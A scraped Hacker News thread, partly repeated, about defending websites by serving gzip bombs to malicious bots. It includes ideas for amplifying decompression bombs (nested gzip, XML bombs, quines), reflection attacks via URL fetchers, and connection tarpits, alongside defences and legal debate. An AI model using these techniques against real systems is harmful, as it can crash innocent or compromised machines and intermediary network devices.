I would think Transfer-Encoding would be a better choice than Content-Encoding. It's processed at a lower level of the stack and must be decoded – Content-Encoding is generally only decoded if the client is specifically interested in whatever's inside the payload. (Note that you don't have to specify the large Content-Length in this case as it is implied by the transfer coding.)
Also worth trying is an XML bomb [1], though that's higher up the stack.
Of course you can combine all three in one payload (since it's more likely that lower levels of the stack implement streaming processing): gzip an XML bomb followed by a gigabyte of space characters, then gzip that followed by a gigabyte of NULs, then serve it up as application/xml with both Content-Encoding and Transfer-Encoding: gzip.
(Actually now that I think of it, even though a terabyte of NULs compresses to 1 GiB [2], I bet that file is itself highly compressible, or could be made to be if it's handcrafted. You could probably serve that up easily with a few MiB file using the above technique.)
EDIT: In fact a 100 GiB version of such a payload compresses down do ~160 KiB on the wire. (No, I won't be sharing it as I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.)
> EDIT: In fact a 100 GiB version of such a payload compresses down do ~160 KiB on the wire. (No, I won't be sharing it as I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.)
> ... I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.
Sure. But gzip bombs don't do substantial (if any) permanent damage. At most, they'd crash the system. And indeed, that might attract the attention of owners, who might then discover that their devices had been compromised.
Most (all?) user-agents don't set the TE header (which specifies the transfer encodings the UA is willing to accept), so I doubt they would bother to decode unsolicited "Transfer-Encoding: gzip".
The Accept-Encoding header is used to specify the acceptable transfer encodings. Certainly all browsers set it, and most "advanced" frameworks will at least handle the common values of Transfer-Encoding regardless; a "malicious" crawler will almost certainly have to, as plenty of sites use Accept-Encoding along with User-Agent to block undesirable bots.
I wonder how these techniques play along with random IDS/IPS/deep packet inspection/WAF/AV/DLP/web cache/proxy/load balancer/etc. devices that happen to look/peak into traffic that passes through network. I would wager my $ that more than a couple will need some admin(istrative) care after running some of this stuff via them.
And btw -- when you end up accidentally crashing/DoS:ing your corporate WAF or ISPs DPI, who are they going to call?
I worked on an IPS a few years back. It was specifically designed NOT to inflate arbitrary ZIP files. All decoders worked in a streaming fashion and were limited to a fixed (low) nesting depth and preallocated memory. Typically they would be configured to reject traffic such as the payload we've been discussing.
I'm also intrigued by this, it also happens in comments, that the top post with 20+ upvotes can have the same content as the most down-voted post with -3 points, but not as common as reposts getting to the front page, while the original only got 2 points.
After submitting something to HN I like to watch the HTTP logs, I get a lot of visitors from bots, but it's actually only ca 10-20 real people that actually read your blog. I don't know eneough of statisitcs to explain it well, but as 20 people is so small amount of the total HN readers, it's basically luck. And the representation of those who reads the "new" section might be a bit skewed from those who only reads the front page. If you want to help HN get better with more interesting content, you can help by actually visiting the "new" section.
We know how to deal with this, and have for years. A bot which instruments and invokes humans, learning about content and individuals both. Few humans are needed each time, and those need not be experts, if used well. 20 people is much more than enough. A candy machine, in an undergraduate lounge, can grade CS 101 exams.1 Ah, but discussion support - from Usenet to reddit (and on HN too), incentives do not align with need. Decades pass, and little changes. Perhaps as ML and croudsourcing and AR mature? Civilization may someday be thought worth the candles. Someday?
Edit: tl;dr: Future bot: "I have a submission. It has a topic, a shape, and other metrics. It's from a submitter, with a history. Perhaps it has comments, also with metrics, from people also with histories. I have people available, currently reading HN, who all have histories. That's a lot of data - I can do statistics. Who might best reduce my optimization function uncertainty? I choose consults, draw the submission to their attention, and ask them questions. I iterate and converge." Versus drooling bot: "Uhh, a down vote click. Might be an expert, might be eternal September... duh, don't know, don't care. points--. Duh, done."
Maybe the "new" section should be the default one.
The Economist once changed their default comments view from "most recommended" to "newest". Suddenly the advantage of being the first to post a moderately good comment vanished. Design matters.
You can try writing "Show HN" at the start of your title, but that hasn't even helped me too much. I still get more upvotes/karma from writing witty comments instead of publishing code.
My pet theory is that very few people visit /newest and even less are consistently and persistently active over there. This means that, in general, only a handful of people's inherently subjective taste steers the ship. I find this fascinating.
1. Stop posting to HN and let others do it for you
2. Spend more effort in writing blog and less on HN karma
3. ... (monetize)
4. Profit!!! (+ more blog posts about how you monetized and instantly gain more HN karma than posting will ever do)
Reminds me of a time I once wrote a script in Node to send an endless stream of bytes at a slow & steady pace to bots that were scanning for vulnerable endpoints. It would cause them to hang, preventing them from continuing on to their next scanning job, some remaining connected for as long as weeks.
I presume the ones that gave out sooner were manually stopped by whoever maintains them or they hit some sort of memory limit. Good times.
1-347-514-7296 is a phone number that automates this. Add it to a conference call, and frustrate the caller with no additional work. http://Reddit.com/r/itslenny is the closest thing it has to an official site.
Very interesting read indeed. I've a question about it; the article is about defeating malicious crawlers/bots affecting a TOR hidden service, so my question is, how might the author differentiate bot requests from standard client requests on a request-by-request basis? I mean, can I assume that many kinds of requests arrive at hidden service through shared/common relays? Would this mean other fingerprinting methods (user agent etc) would be important, and if so, what options remain for the author if the attackers dynamically change/randomise their fingerprint on a per-request basis?
Wait a minute... He is doing the exact same thing as the former RaaS (ransomware as a service) operator Jeiphoos (he operated Encryptor RaaS).
It's know that Jeiphoos is from Austria. Exactly one year after the shutdown of the service, someone from Austria is publishing the exactly same thing an Austrian ransomware operator were doing a year ago.
Does anyone know if this kind of white hat stuff has been tested by law?
Because it seems in the realm of possibility that if a large botnet hits you and your responses crash a bunch of computers you could do serious time for trying it. I'm hoping there's precedent against this...
He's got a pretty good defence in that all he's really doing is filtering requests and serving up a really large file to some of them. No active agency, and no executable code. If merely loading a large file crashes a computer, that's arguably the fault of the browser and/or OS.
Most of those laws are self defence laws. The US & the UK have slight differences, but you're often allowed to use leathal force to prevent yourself being killed.
A better outcome for an infected machine is complete failure than silent intrusion. The person then definitely knows something is wrong, AV software or not.
Moving your money between banks... (In different countries)
Buying stocks... (With insider knowledge)
A simple act doesn't spell the whole story, and fraud, computer crime, etc laws are written vaguely enough for a country to prosecute someone " sending large files."
Without any headers, metadata or padding and using RLE one byte for 0 and 8 bytes for the number of zeroes: 10^15 will easily fit 9 bytes and can be used to generate a file filled with one petabyte of zeroes.
I don't think this "Defends" your website. If anything, it draws attention to it.
Might also be used for some kind of reflection attack. Want to kill some service that let's users provide a url (for an avatar image or something) - point it to your zip bomber.
Yes, but your decompression middle ware might need an update/change:
When you ask for a decompress, you specify the max size (if you are asking it to decompress everything).
Interesting page :)
I'll write your friend an email with improvements for the site. The text shadow in the code blocks make them barely readable and the map color coding is bad for color blind people.
This is like the soft equivalent of leaving a USBKill device in your backpack, to punish anyone who successfully steals it and tries to comb through your data.
This would be an entertaining way of dealing with MITM agents as well, over HTTP. As long as the client knows not to open the request, you could trade them back and forth with the MITM spy wasting tons of overhead.
It would be an interesting way of streaming data if both sides used a custom decompression algorithm that skipped n bytes without allocating it anywhere.
The payload could be encrypted text of two chat bots talking jibberish.
Another method is wasting attackers' time by sending out a character per second or so. It works so well for spam, that OpenBSD includes such a spamd honeypot.
Sending out character per second would mean that you'll keep connection open for long time and even if your server is behind CDN this would eventually let attacker exhaust your resources.
If a large number of hosts treats some behaviour as deserving a slow-service attack, then clients exhibiting that behaviour are faced with a large set of slow-serving servers.
Any given server can monitor how many slow-service attacks it is currently providing. Given that a criterion for an SSA is having already determined that the connection is not a friendly one, then monitoring useful vs. useless (e.g., SSA) connections, and being prepared to terminate (or better: simply abandon) the SSA connections as normal traffic ramps up, is a net benefit.
Meantime, the hostile clients are faced by a pervasive wall of mud, slowing their access.
An open connection with no communication going on does not take away a lot of resources, it's just some values in some table maintained by the TCP stack. If you implement that slow down service event based so it can handle a lot of concurrent connections it should not take away much resources either. In the end you can always limit the amount of connections you treat that way to a value your system can easily bear.
Ssh does support compression, but it seems to be only if the client requests it (ssh -C).
You could, though, write a pam module to trickle data out very slowly. Maybe pam_python would be easier to experiment with.
I use pam_shield to just null route ssh connections with X failed login attempts. There's no retaliation in that approach, but it does stop the brute forcing.
If you are being adventurous, I guess you can just let them log in for a special user that has the shell set to a program that sends single characters very slowly. It is probably quite insecure, though.
In this day and age, finding a vulnerability in a system like a mistakenly open API and running a script to call it a few times to investigate the weakness is considered hacking.
It probably shouldn't be, but law is funny that way.
Intentionally sending a zip bomb could potentially get you in trouble as well. Especially if you're just one private person or a small company without a legal division to brush it off.
There isn't a real black/white interpretation though, at least not outside the US (where there may be history to influence ruling on the subject), and obviously most victims wouldn't report you, but more often than not you wouldn't want to test interpretation of IT related law.
This is more that the thief is parked at your front door permanently trying to pick the lock, so you replace the valuables he's looking for with big chunks of lead.
I thought of http2's hpack. It does have built in protection though...the client sets a maximum header table size. Which encourages client implementations to think about it.
That also crossed with another thought about pre-compressing (real!) content so that Apache can serve it gzipped entirely statically with sendfile() rather than using mod_deflate on the fly, so unless I've misunderstood I think that bot defences can be served entirely statically to minimise CPU demand. I don't mind a non-checked-in gzip -v9 file of a few MB sitting there waiting...
Oh this seems quite an interesting experiment. Curious though if this defence poses no additional risks (beside bandwidth) on the server. I mean, is there any significant chance that the random data could cause a glitch on the server implementation?
Both ZIP and GZIP file formats store the uncompressed filesize in their headers. You could stream and check for these headers to determine if the a zip bomb is being delivered. Obviously something script-kiddies aren't going to do, but the scripts they use can be improved and redistributed fairly easily.
Could the head be spoofed in such a way that the header says 1MB, or might the clients/bots be typically strict on ensuring header values are valid? I think your raised issue is important though, and any serious client/bot should be ignoring files with 1KB -> 1GB decompression ratios.
Do browsers protect against media served with Content- or Transfer-Encoding like this? If you use something that lets you embed images, what's to stop you from crashing the browser of anyone who happens to visit the page your "image" is on?
A similar `slow bomb` could be created for attempted ssh connections to a host using a sshrc script. For example clients which do not present a key, just keep them connected and feed them garbage from time to time. Or rickroll them.
10 MB (the compressed GZIP given in the example) can be considerable. Even more so if you consider just how frequently bots are hitting those wp endpoints.
We are developing a web application security scanner [1] and we indeed use max length setting and also detect binary responses, just tested this and as expected it worked fine.
I'm actually surprised that many other scanners failed to do this.
> Wouldn't all but the most naive scanners use time-out settings, maximum lengths on bytes read etc?
It wouldn't save a scanner from crashing to use a time-out or max read bytes. The defense can send the 100kb zipped data in a matter of seconds. The client then decompresses the zipped data which expands to gigabytes, causing crashes by out-of-memory.
Interesting, on FF54 the test link pegs a CPU but the memory doesn't rise. Eventually it stops and CPU returns to normal. But then I did a 'view source', and the memory use rose until the browser got oomkilled (20GB free ram + swap)
I would think Transfer-Encoding would be a better choice than Content-Encoding. It's processed at a lower level of the stack and must be decoded – Content-Encoding is generally only decoded if the client is specifically interested in whatever's inside the payload. (Note that you don't have to specify the large Content-Length in this case as it is implied by the transfer coding.)
Also worth trying is an XML bomb [1], though that's higher up the stack.
Of course you can combine all three in one payload (since it's more likely that lower levels of the stack implement streaming processing): gzip an XML bomb followed by a gigabyte of space characters, then gzip that followed by a gigabyte of NULs, then serve it up as application/xml with both Content-Encoding and Transfer-Encoding: gzip.
(Actually now that I think of it, even though a terabyte of NULs compresses to 1 GiB [2], I bet that file is itself highly compressible, or could be made to be if it's handcrafted. You could probably serve that up easily with a few MiB file using the above technique.)
EDIT: In fact a 100 GiB version of such a payload compresses down do ~160 KiB on the wire. (No, I won't be sharing it as I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.)
[1] https://en.wikipedia.org/wiki/Billion_laughs
[2] https://superuser.com/questions/139253/what-is-the-maximum-c...
> EDIT: In fact a 100 GiB version of such a payload compresses down do ~160 KiB on the wire. (No, I won't be sharing it as I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.)
http://www.aerasec.de/security/advisories/decompression-bomb... has a triple-gziped 100GB file down to 6k, the double-gzipped version is 230k.
I'm trying on 1TB, but it turns out to take some time.
> ... I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.
Sure. But gzip bombs don't do substantial (if any) permanent damage. At most, they'd crash the system. And indeed, that might attract the attention of owners, who might then discover that their devices had been compromised.
You only get two gzips, not three :) (transfer and content codings)
Unless you're serving up XML which is itself zipped, such as an Open Office document. But most clients won't be looking for that.
One useful trick is that, for gzip, d(z(x+y)) = d(z(x) + z(y)).
So you don't need to compress the entire terabyte.
4 replies →
If you are smart, you craft your compressed files to be infinite by making them Quines: https://alf.nu/ZipQuine
It's unlikely any of the parsers would apply recursive decompression, so a ZipQuine isn't going to help exhaust resources.
4 replies →
Most (all?) user-agents don't set the TE header (which specifies the transfer encodings the UA is willing to accept), so I doubt they would bother to decode unsolicited "Transfer-Encoding: gzip".
The Accept-Encoding header is used to specify the acceptable transfer encodings. Certainly all browsers set it, and most "advanced" frameworks will at least handle the common values of Transfer-Encoding regardless; a "malicious" crawler will almost certainly have to, as plenty of sites use Accept-Encoding along with User-Agent to block undesirable bots.
2 replies →
Good point, I didn't realize that.
I wonder how these techniques play along with random IDS/IPS/deep packet inspection/WAF/AV/DLP/web cache/proxy/load balancer/etc. devices that happen to look/peak into traffic that passes through network. I would wager my $ that more than a couple will need some admin(istrative) care after running some of this stuff via them.
And btw -- when you end up accidentally crashing/DoS:ing your corporate WAF or ISPs DPI, who are they going to call?
I worked on an IPS a few years back. It was specifically designed NOT to inflate arbitrary ZIP files. All decoders worked in a streaming fashion and were limited to a fixed (low) nesting depth and preallocated memory. Typically they would be configured to reject traffic such as the payload we've been discussing.
How come when I posted this (my blog post) here I only got 2 points? https://news.ycombinator.com/item?id=14704462 :D
I'm also intrigued by this, it also happens in comments, that the top post with 20+ upvotes can have the same content as the most down-voted post with -3 points, but not as common as reposts getting to the front page, while the original only got 2 points.
After submitting something to HN I like to watch the HTTP logs, I get a lot of visitors from bots, but it's actually only ca 10-20 real people that actually read your blog. I don't know eneough of statisitcs to explain it well, but as 20 people is so small amount of the total HN readers, it's basically luck. And the representation of those who reads the "new" section might be a bit skewed from those who only reads the front page. If you want to help HN get better with more interesting content, you can help by actually visiting the "new" section.
We know how to deal with this, and have for years. A bot which instruments and invokes humans, learning about content and individuals both. Few humans are needed each time, and those need not be experts, if used well. 20 people is much more than enough. A candy machine, in an undergraduate lounge, can grade CS 101 exams.1 Ah, but discussion support - from Usenet to reddit (and on HN too), incentives do not align with need. Decades pass, and little changes. Perhaps as ML and croudsourcing and AR mature? Civilization may someday be thought worth the candles. Someday?
1 http://represent.berkeley.edu/umati/
Edit: tl;dr: Future bot: "I have a submission. It has a topic, a shape, and other metrics. It's from a submitter, with a history. Perhaps it has comments, also with metrics, from people also with histories. I have people available, currently reading HN, who all have histories. That's a lot of data - I can do statistics. Who might best reduce my optimization function uncertainty? I choose consults, draw the submission to their attention, and ask them questions. I iterate and converge." Versus drooling bot: "Uhh, a down vote click. Might be an expert, might be eternal September... duh, don't know, don't care. points--. Duh, done."
1 reply →
Maybe the "new" section should be the default one.
The Economist once changed their default comments view from "most recommended" to "newest". Suddenly the advantage of being the first to post a moderately good comment vanished. Design matters.
You can try writing "Show HN" at the start of your title, but that hasn't even helped me too much. I still get more upvotes/karma from writing witty comments instead of publishing code.
a bit of a witty comment there...upvoted. :)
My pet theory is that very few people visit /newest and even less are consistently and persistently active over there. This means that, in general, only a handful of people's inherently subjective taste steers the ship. I find this fascinating.
Lessons learned:
</saracasm>
=) upvoted for original content.
Upload time of day is also important
Also if it doesn't make it to the front page, it's hardly seen at all.
5 replies →
Bad luck. There aren't very many people looking at the new posts page, and posts drop off quite fast.
Sorry! Didn't realize you already posted this before.
Meritocracy /s
Reminds me of a time I once wrote a script in Node to send an endless stream of bytes at a slow & steady pace to bots that were scanning for vulnerable endpoints. It would cause them to hang, preventing them from continuing on to their next scanning job, some remaining connected for as long as weeks.
I presume the ones that gave out sooner were manually stopped by whoever maintains them or they hit some sort of memory limit. Good times.
I do the same to "Microsoft representatives" that call me because I have "lots of malware on my computer".
Keep them on line by being a very dumb customer until they start cursing and hang up on me. : - )
1-347-514-7296 is a phone number that automates this. Add it to a conference call, and frustrate the caller with no additional work. http://Reddit.com/r/itslenny is the closest thing it has to an official site.
5 replies →
Doesn't that burn up a lot of time? I just cut straight to the hanging-up part, with optional cursing to taste.
1 reply →
This is actually a new take on a fairly well known security/DoS attack called the "slow post" attack (https://blog.qualys.com/securitylabs/2012/01/05/slow-read)
pretty novel to see it used the other way around though!
Interesting and related re attacks on a Tor hidden service: http://www.hackerfactor.com/blog/index.php?/archives/762-Att...
And the follow up: http://www.hackerfactor.com/blog/index.php?/archives/763-The...
Very interesting read indeed. I've a question about it; the article is about defeating malicious crawlers/bots affecting a TOR hidden service, so my question is, how might the author differentiate bot requests from standard client requests on a request-by-request basis? I mean, can I assume that many kinds of requests arrive at hidden service through shared/common relays? Would this mean other fingerprinting methods (user agent etc) would be important, and if so, what options remain for the author if the attackers dynamically change/randomise their fingerprint on a per-request basis?
Very entertaining read, thank you for sharing these. I used to dismiss black ICE [0] as cyberpunk tropes and it's good to be proven ignorant.
[0]:https://en.wikipedia.org/wiki/Intrusion_Countermeasures_Elec...
Wait a minute... He is doing the exact same thing as the former RaaS (ransomware as a service) operator Jeiphoos (he operated Encryptor RaaS). It's know that Jeiphoos is from Austria. Exactly one year after the shutdown of the service, someone from Austria is publishing the exactly same thing an Austrian ransomware operator were doing a year ago.
Aha! the Hackernews detectives are on the case!
Does anyone know if this kind of white hat stuff has been tested by law?
Because it seems in the realm of possibility that if a large botnet hits you and your responses crash a bunch of computers you could do serious time for trying it. I'm hoping there's precedent against this...
He's got a pretty good defence in that all he's really doing is filtering requests and serving up a really large file to some of them. No active agency, and no executable code. If merely loading a large file crashes a computer, that's arguably the fault of the browser and/or OS.
Intent really matters, especially in cases like these. He's serving up files deliberately, knowing they will likely cause problems.
Microsoft doesn't take the fall for malware, even if its a fault in SMB or the like.
The intent is damage.
13 replies →
There are laws allowing person to shoot intruder in their house. And I can't serve nulls from my own web server? That would be ridiculous.
From what I've read, in some parts of America it seems okay to shoot at intruders running away from your house, which I find unreasonable.
A farmer here in UK stirred up a whole load of shit when he shot two burglars [1] trying to escape from his property.
[1] https://en.wikipedia.org/wiki/Tony_Martin_(farmer)
15 replies →
Most of those laws are self defence laws. The US & the UK have slight differences, but you're often allowed to use leathal force to prevent yourself being killed.
1 reply →
Do you have an NRA?
A better outcome for an infected machine is complete failure than silent intrusion. The person then definitely knows something is wrong, AV software or not.
I don't think there's a law against serving obscenely large files on the web, at least nowhere except Germany.
>I don't think there's a law against...
Connecting to a server...( A lot)
Putting random strings into forms...( A lot)
Moving your money between banks... (In different countries)
Buying stocks... (With insider knowledge)
A simple act doesn't spell the whole story, and fraud, computer crime, etc laws are written vaguely enough for a country to prosecute someone " sending large files."
This is why web crawlers are built with upper boundaries on everything!
Nobody malicious brings down crawlers. It's just unexpected things you find out on the internet.
> Nobody malicious brings down crawlers.
You're wrong about that. I've more than once brought down crawlers on purpose, especially the ones that didn't respect robots.txt.
The article says that 42.zip compresses 4.5 petabytes down to 42 bytes. It should say 42 kilobytes.
I don't see a way to comment on the article itself, but hopefully the author reads this.
Thank you. I was going crazy trying to think of what the contents of that 42 bytes would have been.
Without any headers, metadata or padding and using RLE one byte for 0 and 8 bytes for the number of zeroes: 10^15 will easily fit 9 bytes and can be used to generate a file filled with one petabyte of zeroes.
1 reply →
thanks I fixed it
Another small point, you don't need that starts with function, just use strpos === 0.
1 reply →
I don't think this "Defends" your website. If anything, it draws attention to it.
Might also be used for some kind of reflection attack. Want to kill some service that let's users provide a url (for an avatar image or something) - point it to your zip bomber.
To be fair, people wanting to do that don't need author to have create a zip bomber, they can do it by themselves.
Actually, I don't see how to defend this. Is there any way to ask a gzip file which size it will be once unzipped, without needing to decompress it?
>Is there any way to ask a gzip file which size it will be once unzipped, without needing to decompress it?
The closest is uncompressing it and counting and immediately discarding the bytes in the output stream.
But of course the proper defense is to give up if you exceed a predefined memory or time budget.
Yes, but your decompression middle ware might need an update/change: When you ask for a decompress, you specify the max size (if you are asking it to decompress everything).
I think this is exactly what the HTTP 'HEAD' verb is for: https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HE...
2 replies →
Decompress it in chunks and stop when a preset limit is reached.
A friend of mine has a very useful little service that tracks attempts to breach servers from all over the world:
https://www.blockedservers.com/
It's a lot more effective to kill the connection rather than to start sending data if you're faced with a large number of attempts.
Interesting page :) I'll write your friend an email with improvements for the site. The text shadow in the code blocks make them barely readable and the map color coding is bad for color blind people.
I'm sure he will appreciate that. He's sysadmin at a Dutch IPSP and this is his side project.
This is like the soft equivalent of leaving a USBKill device in your backpack, to punish anyone who successfully steals it and tries to comb through your data.
Way to make friends with the TSA. ;-)
Is this actually illegal? I'm sure they'd arrest you, but could they actually charge you?
I guess if you see them try to use the USB killer, you'd be obligated to report it. Otherwise I don't think its an issue.
2 replies →
I think the natural next step is to make this into a Wordpress plugin.
This would be an entertaining way of dealing with MITM agents as well, over HTTP. As long as the client knows not to open the request, you could trade them back and forth with the MITM spy wasting tons of overhead.
It would be an interesting way of streaming data if both sides used a custom decompression algorithm that skipped n bytes without allocating it anywhere.
The payload could be encrypted text of two chat bots talking jibberish.
Now that's very interesting. Maybe hack a custom ssh with this feature. Adversaries that intercepted data or attempted MitM would be inconvenienced.
Edit: Or even more useful, bbcp. Which is the best file transfer app that I've ever used.
2 replies →
Sounds a bit like a simplified "Chaffing and Winnowing"[1], where the chaff identification is pre-shared through your custom compression parameters.
There was a HN story[2] on Chaffinch[2], which is where I came across teh idea.
[1] https://en.wikipedia.org/wiki/Chaffing_and_winnowing [2] https://news.ycombinator.com/item?id=14408757 [3] https://www.cl.cam.ac.uk/~rnc1/Chaffinch.html#Chaffing
Another method is wasting attackers' time by sending out a character per second or so. It works so well for spam, that OpenBSD includes such a spamd honeypot.
Sending out character per second would mean that you'll keep connection open for long time and even if your server is behind CDN this would eventually let attacker exhaust your resources.
Think this through.
If a large number of hosts treats some behaviour as deserving a slow-service attack, then clients exhibiting that behaviour are faced with a large set of slow-serving servers.
Any given server can monitor how many slow-service attacks it is currently providing. Given that a criterion for an SSA is having already determined that the connection is not a friendly one, then monitoring useful vs. useless (e.g., SSA) connections, and being prepared to terminate (or better: simply abandon) the SSA connections as normal traffic ramps up, is a net benefit.
Meantime, the hostile clients are faced by a pervasive wall of mud, slowing their access.
1 reply →
An open connection with no communication going on does not take away a lot of resources, it's just some values in some table maintained by the TCP stack. If you implement that slow down service event based so it can handle a lot of concurrent connections it should not take away much resources either. In the end you can always limit the amount of connections you treat that way to a value your system can easily bear.
1 reply →
I would love to know how to configure this for ssh connection attempts
Ssh does support compression, but it seems to be only if the client requests it (ssh -C).
You could, though, write a pam module to trickle data out very slowly. Maybe pam_python would be easier to experiment with.
I use pam_shield to just null route ssh connections with X failed login attempts. There's no retaliation in that approach, but it does stop the brute forcing.
If you are being adventurous, I guess you can just let them log in for a special user that has the shell set to a program that sends single characters very slowly. It is probably quite insecure, though.
I have something similar on my VPS, edit /etc/issues.net to this
fail2ban, in a general sense.
2 replies →
We need some legal advice in this thread.
What if the compressed file is plausibly valid content? How could intent be malicious if a request is served with actual content?
In this day and age, finding a vulnerability in a system like a mistakenly open API and running a script to call it a few times to investigate the weakness is considered hacking.
It probably shouldn't be, but law is funny that way.
Intentionally sending a zip bomb could potentially get you in trouble as well. Especially if you're just one private person or a small company without a legal division to brush it off.
There isn't a real black/white interpretation though, at least not outside the US (where there may be history to influence ruling on the subject), and obviously most victims wouldn't report you, but more often than not you wouldn't want to test interpretation of IT related law.
Reminds me a bit of Upside-Down-Ternet: http://www.ex-parrot.com/pete/upside-down-ternet.html
Defending by throwing things back at the attacker, instead of simply locking your door.
This is more that the thief is parked at your front door permanently trying to pick the lock, so you replace the valuables he's looking for with big chunks of lead.
More like hungry bears.
This might actually work well with fail2ban integration. Every time you block a connection, you also respond to the final request with a big ol' file.
No, he’s doing both.
A great way... to provoke a war with people running botnets.
This could also be seen as a bug on the browser side. I'd also be interested in the browser results for the petabyte version.
I wonder if there's room to do this with other protocols? Ultimately we want to crash whatever tool the scriptkiddy uses.
I thought of http2's hpack. It does have built in protection though...the client sets a maximum header table size. Which encourages client implementations to think about it.
About a month ago one of my websites was being scraped. They were grabbing JSON data from a mapping system.
I replaced it with a GZIP bomb. It was very satisfying to watch the requests start slowing down, and eventually stop.
Interesting!
That also crossed with another thought about pre-compressing (real!) content so that Apache can serve it gzipped entirely statically with sendfile() rather than using mod_deflate on the fly, so unless I've misunderstood I think that bot defences can be served entirely statically to minimise CPU demand. I don't mind a non-checked-in gzip -v9 file of a few MB sitting there waiting...
http://www.earth.org.uk/note-on-site-technicals.html
Similar topic a couple of months ago:
https://news.ycombinator.com/item?id=14280084
Directly serving /dev/zero or /dev/urandom also gives interesting results. (Be aware of bandwidth costs)
Oh this seems quite an interesting experiment. Curious though if this defence poses no additional risks (beside bandwidth) on the server. I mean, is there any significant chance that the random data could cause a glitch on the server implementation?
Wow, you killed Tails!
I tried visiting the payload site with Tails OS (a Linux distro for privacy minded) and the whole OS is frozen.
Both ZIP and GZIP file formats store the uncompressed filesize in their headers. You could stream and check for these headers to determine if the a zip bomb is being delivered. Obviously something script-kiddies aren't going to do, but the scripts they use can be improved and redistributed fairly easily.
Could the head be spoofed in such a way that the header says 1MB, or might the clients/bots be typically strict on ensuring header values are valid? I think your raised issue is important though, and any serious client/bot should be ignoring files with 1KB -> 1GB decompression ratios.
Was there a reduction in ip's that Fail2ban would have picked up but instead were treated with the zip bomb?
Do browsers protect against media served with Content- or Transfer-Encoding like this? If you use something that lets you embed images, what's to stop you from crashing the browser of anyone who happens to visit the page your "image" is on?
Nothing. I mean, crashing browsers with a client-side DoS is possible in many ways.
With some horrible WebGL code I've crashed the macOS compositor before.
Browsers alredy have massive codebases, I can't really imagine securing every non-security critical DoS vector
A similar `slow bomb` could be created for attempted ssh connections to a host using a sshrc script. For example clients which do not present a key, just keep them connected and feed them garbage from time to time. Or rickroll them.
doesn't this incur large bandwidth data charges for the defender?
no, it's just sending a tiny zip file, decompression occurs at the other end
10 MB (the compressed GZIP given in the example) can be considerable. Even more so if you consider just how frequently bots are hitting those wp endpoints.
2 replies →
Wouldn't all but the most naive scanners use time-out settings, maximum lengths on bytes read etc?
We are developing a web application security scanner [1] and we indeed use max length setting and also detect binary responses, just tested this and as expected it worked fine.
I'm actually surprised that many other scanners failed to do this.
[1] https://www.netsparker.com
> Wouldn't all but the most naive scanners use time-out settings, maximum lengths on bytes read etc?
It wouldn't save a scanner from crashing to use a time-out or max read bytes. The defense can send the 100kb zipped data in a matter of seconds. The client then decompresses the zipped data which expands to gigabytes, causing crashes by out-of-memory.
Was thinking more about a maximum length for the decompression stage.
1 reply →
What are good strategies for protecting your website against ZIP bomb file uploads?
Ironically, it looks like the site has been DOSd by HN.
you better have unlimited bandwidth to try 10G))
In the example, the server only sends 10MB. The data is 10GB only after unzipping, which occurs on the client.
brilliant
Interesting, on FF54 the test link pegs a CPU but the memory doesn't rise. Eventually it stops and CPU returns to normal. But then I did a 'view source', and the memory use rose until the browser got oomkilled (20GB free ram + swap)
I wonder is the browser is smart enough to not decompress when viewing or just uses it at a stream?
* Firefox: Memory rises up to 6-7gig, then just loads endlessly. Tab closable.
Just tried it using piedpiper's middle-out algorithm and seeing astonishing results. It's so simple! D2F.1 = D2F.2, D2F.3 = D2F.4